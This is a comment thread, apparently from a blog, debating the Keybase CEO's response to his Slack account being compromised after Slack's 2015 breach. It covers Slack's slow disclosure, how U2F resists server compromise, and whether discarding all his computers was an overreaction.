The CEO of Keybase has some things to say about this:
In the subsequent days and weeks, I reset all of my passwords, threw away all my computers, bought new computers, factory-reset my phone, rotated all of my Keybase devices (i.e., rotated my "keys"), and reestablished everything from the ground up. It cost Keybase and me a lot of time, money and stress. In the end, I was pretty sure but not 100% convinced that if I had been "rooted", that the attackers couldn't follow me to my new setup. But with these things, you can never know for sure. It's a really scary thing to go through. [...]
Also, Slack's announcement seems to say 1% of accounts were still compromised (after 4 years), but we are wondering: how many were compromised then? And what percentage of messages did the compromised accounts have access to? 10%? 50%? Only the hackers know, but it's likely much more than 1%.
And finally, we know the original compromise was in 2015, but I was only notified of a suspicious login in 2019. Were our Dutch friends sifting through our messages for four years before Slack notified us of a suspicious login? [...]
Keybase messages are end-to-end encrypted, and only our users control their decryption keys. A break-in our of our servers, even one injecting code, cannot yield unencrypted messages or jeopardize message integrity.
Now, grain of salt and all, being from a competitor, but I'm with Keybase on this one. I can't see any good reason to choose Slack over Keybase unless you are making the decision that you want the slider between "convenience" and "security" to be wayyyyyy over to the left.
I've been lightly using Keybase for a little while now. Setup is definitely complex, but once its running, it's good at what it does -- which is to say, IRC channels with end to end crypto, but also mission-critical EMOJI.
It is sure as shit better than Signal: it doesn't leak your phone number, and is actually open source.
Incidentally, if anyone can tell me how to use the Keybase API to extract the plain-text of my chats, that would be appreciated.
Keybase seem to really not like providing api docs. Instead of maintaining online documentation that they already write and provide with keybase they just tell you to read keybase chat help api. That really, really helps when you're trying to support someone without having keybase installed, Keybase.
I'm not going to rehash why you're silly about Signal.
I'm here because in the middle of his fun story about supposedly throwing away a lot of expensive gear in a panic Max says "If the attackers inject server code, 2FA or U2F or any Web-based security practice does little" which is completely wrong, and ought to give pause to anybody who has been following along thinking "This Max guy seems to know what's up".
If Keybase's Slack account had been secured with U2F nothing would have happened. No cancelled ski trip, no bad guys getting into the "definitely not for researching the competitor product" Slack account, no expensive computers trashed, no blog post with opportunity to grow your customer base, er, I mean, tell a funny story.
In U2F the server (where these bad guys apparently had control back in 2015) doesn't know any secrets about the authenticated user. This means there's no way to "steal" durable access, as was done with passwords and would be possible with technologies like TOTP or SecurID tokens.
All those technologies rely on a secret. The server must learn what the secret is, albeit for passwords it usually tries to forget again soon after, as part of the authentication protocol. But U2F isn't like that, something way cleverer happens. In U2F's enrollment process the user's Security Key hands over a "cookie" and a public key minted for this enrollment, plus a message signed with that key to prove it knows the associated private key. It promises that in future when told the same cookie again it will sign a new message to prove it still knows the private key.
So bad guys who have access to a server can steal the cookie, and the public key, but neither of those is secret, they're useless to anyone else. And as soon as their control over that server ends, they're locked out, knowing the cookie or public key doesn't let them pretend to be a user, nor does it let them pretend to the user that they're the real server.
But I locked my front door when I went on holidays?! How could the thieves possibly enter?
Welcome to jwz's comment section, anonymous-ish Slack employee. Please also provide us five blow-hard paragraphs about why Slack was right in waiting four years to disclose a major security breach to users.e
On the Internet nobody knows you're a dog. But rather than do any work say, extrapolating from previous interactions - they will start by assuming you're a shill.
No, I'm just here because it annoys me to see people insist that oh, the one thing that would have helped (U2F / WebAuthn) wouldn't have helped, so really they were pretty smart not to use that, and you shouldn't either. And so nothing improves.
Since I'm back working for a tiny startup again we actually have both Slack and Keybase, and doubtless other chat technologies that are used inconsistently and probably all were signed for with somebody's personal GMail account.
The "burn all the computers" panic would make sense if the attackers used compromised Slack servers to install keyloggers on end-user systems. Someone would probably notice that if it was happening en masse, though. Maybe.
Thing is, neither Keybase nor Slack said anything about key loggers. A logger was installed at the server to capture plaintext passwords--presumably those that are normally received in the clear as part of the Slack service, and which are not available by stealing the database (which contains hashes not plaintext). That detail is important--nobody can reverse a hash of a password generated by a competent password generator. For this article to exist, someone had to collect the plaintext version of Max's password. That task doesn't need a keylogger installed on one of Max's computers--a few extra lines of code on the Slack login server will suffice.
So the attackers get access to Slack accounts, and sell those to the highest bidders. They probably did it in several small and expensive pieces over a period of 4 years to try to make more money than selling it all at once. Fortunately for them, Slack played along, keeping the stolen passwords valid for years longer than they should have, protecting the commercial value of their stolen assets. It only stopped when so many copies of the data had been sold (and leaked by buyers with worse opsec than Slack) that it became profitable to sell the data back to Slack for a bug bounty.
Seriously, though, Slack's incident response was terrible. Like, "we didn't find your name on a list of a zillion usernames and passwords that were stolen from us, so we're sure you're totally OK, but maybe change your password every few years just in case, or buy a yubikey. Not for any specific reason, or anything, certainly not for any reason we could be sued or prosecuted for. It's just a good idea." As opposed to "it was our turn to have our authentication database compromised this month, please assume your old password has been scratched into the paint of every public lavatory wall and act accordingly."
Well, he did that based on 1) evidence that his Slack account was compromised and 2) evidence that Slack were not being entirely forthcoming about what was actually going on.
It's still absurd overreaction. It would be like burning all your computers because the local pizza joint gave you the wrong toppings one time. "Someone must have compromised my web browser and changed the order! They're using deep malware to prevent any of my tools from detecting them, because even now there are no anchovies on my screen! They might have put implants into the firmware, who knows how deep this thing goes!!!1! Customer service is playing dumb, they must be in on the conspiracy!"
That "more than 90% convinced that Slack had been compromised" hunch was the correct one. It happens all the time. Try signing up for any 10 local businesses with self-managed infrastructure (car dealerships, pizza joints, national cellular carriers, etc): one of them ends up (presumably involuntarily) selling your login data in the first year, and somebody tries at least once to use it. This is why you use different passwords on different sites--not because one of the sites might be compromised one day, but because one of them always is compromised right now.
Also, if you're an executive of a security-focused company, isn't job #1 to isolate yourself and all your machines from any direct impact on operations? If you're using one laptop for root SSH logins on all the company servers and for bouncing office documents back and forth with shareholders and lawyers and for chatting with your buddies on Slack...maybe you're doing it wrong?
Ok, can you take the dick-measuring contest somewhere else now?
I think you need to get out and relax a bit more often
The way I read it, he burned his computers because he was only 90% sure that Slack was compromised, and he was accounting for the presumed corresponding 10% possibility that they got his password from him via an exploit on one of his machines.
Exactly. In fact, that's reasonably clear. He says that Slack 'implied that I was messy with my security practices and was to blame.'
He burned his computers because Slack misled him.
I'm not unclear on the "Slack misled him" part. That is the only part of the article that doesn't read like infosec fanfic.
The customer service scripts for companies like Slack always say "blame the customer" and 99% of the time they're not wrong because 99% of customers are terrible. Max Krohn, security-focused company CEO, co-founder of other security-focused companies, and one-percenter Slack user, should know this, and expect this response by default. He might have even signed off on a similar script for his own company to use on his own customers.
When Slack said "nope all good here", Max should have pivoted to 89% "Slack has been compromised, but their security team doesn't know it yet", 11% "unlikely scenarios where in some cases burning all my own computers might lead to a better outcome than not burning all my own computers." [1] Then watch carefully for more indicators of compromise to see which theory was right, and do the appropriate thing based on evidence...possibly while also spinning up a replacement set of computers just in case the evidence later points to "burn the computers" after all. [2]
Instead, he dropped the 90% probability and went all in on the 10% one, based on Slack's say-so. This is a rookie procedural error, but Max Krohn is no rookie. Mistakes like this are also a potential sign of stress or burnout which can be expected in Max's current gig (and which makes the vacation cancellation especially ironic). Normally, cooler heads on the incident response team point out that the risks don't match the proposed mitigations before computers end up in the trash (there are also evidence collection procedures, threat analysis, etc to be done before then), but maybe things are different when the company is so small that the CEO is also the incident response team.
Black hats exploit these weaknesses. Some troll posted a fake security advisory against a popular Internet service application. It worked for a while--a lot of network defenders blocked ports for a weekend, inconveniencing sysadmins worldwide--but it was all a hoax, there was no software vulnerability. Whoever did that experiment did learn that a lot of site admins are vulnerable to hoax attacks, and in that sense the attack was completely successful. You don't need complicated software if you can find a random junior sysadmin who doesn't ask the right questions under fire.
This Keybase incident is similar, but the hoax was accidental. A Slack robot did its normal notification duties (yes, about a security compromise, but a totally inconsequential one). In response, the Keybase CEO's unchecked paranoia made him attack himself. All the "damage" on the Keybase side is self-inflicted. [3]
Every time I re-read this article I find more WTF. The "security-focused company" doesn't have enough staff to cover for the CEO on vacation, and therefore also doesn't have enough staff to provide necessary internal boundaries against lateral compromise. There's more, but it's all boring small-company-risk-factors stuff.
[1] Or, burn all the computers as an excuse to buy new ones, but that's an unforced personal choice or maybe insurance fraud. Either way, whining about it in public will get attention, but not the good kind.
[2] If you're planning to use that tactic as part of incident response anyway, why not keep a set of clean machines prepared and ready to deploy? A good infosec fanfic writer would answer that question in the story.
[3] An opportunity to run the "burn all the computers" drill at the CEO level of your company doesn't come along every day, so all the costs listed might be money well spent in training for real attacks later on. But, come on, you can schedule drills around people's vacations.
Alrighty, thanks.
Huh, I totally missed that Keybase is now a Slack competitor rather than just a PGP keyserver.
It still confuses me, what Keybase really is or what I should use it for. I saw the chat feature but it seemed more like "yes, you can do that here too now".
We used to say that email was the killer app, really any messaging that brings you into the online community is the killer app -- so "every app expands until it also does instant messaging."
K3n.
Only the client of Keybase is open source.